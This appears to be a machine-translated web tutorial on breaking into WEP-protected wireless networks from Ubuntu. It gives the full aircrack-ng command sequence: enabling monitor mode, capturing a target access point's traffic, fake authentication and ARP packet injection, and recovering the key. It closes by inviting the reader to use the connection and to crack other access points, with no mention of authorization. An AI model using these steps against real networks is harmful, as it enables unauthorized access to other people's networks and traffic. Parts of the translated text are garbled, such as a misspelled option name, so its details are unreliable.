Ubuntu crack wireless network

  

First, install ubuntu and aircrack-ng First install Ubuntu, update the system to the latest terminal Enter sudo apt-get install aircrack-ng Install aircrack-ng No network, then go to other computers to download aircrack -ng Ubuntu DEB installation package installation Download address: http://packages.ubuntu.com/zh-cn/jaunty/i386/aircrack-ng/download


Second, the crack process 1 Start the monitoring mode of the wireless network card. In the terminal, enter: sudo airmon-ng start wlan0 (wlan0 is the port of the wireless network card, you can enter ifconfig in the terminal to view)

2. Check the wireless AP input in the terminal. : sudo airodump-ng mon0 (Special note: the port of the wireless network is now mon0 !!! after starting the monitoring mode) See which APs are encrypted with wep, then press ctrl+c to exit, keep the terminal

3, capture the package Open another terminal, enter: sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0 (-c followed by 6 is the AP working channel to be cracked, --biss followed by AP'sMAC is to crack the AP's MAC address, -w followed by wep is the file name saved by the captured packet DATA, the specific situation according to the online AP in step 2 to change the channel and MAC address, DATA saved file Name can be named casually)

4. Establish a virtual connection with the AP. Open another terminal and type: sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0 (My MAC followed by -h Is the MAC address of your own wireless network card, the command: iwlist wlan0 scanning can view its own MAC address; its own MAC address is the mac address corresponding to wlan0 under the ifconfig command)

5, after the injection successfully establishes the virtual connection Input: sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 Now look back at the terminal in step 3 is DATA is starting to soar! (That ff copy copy)

6. Decryption After collecting more than 15,000 DATA, open another terminal and enter: sudo aircrack-ng wep*.cap to decrypt (if not calculated, continue Wait, aircrack-ng will automatically run after each additional 7000 of DATA, until the password is calculated, note that the name of the file here is the same as the name set in step 3, and the * is required)

7, after the cracked password, enter sudo airmon-ng stop mon0 in the terminal to close the monitoring mode, otherwise the wireless network card will always be injected into the AP, using ctrl+c to exit or directly shut down the terminal is not acceptable of. Now you can surf, or repeat steps 1-7 to crack other APs

Copyright © Windows knowledge All Rights Reserved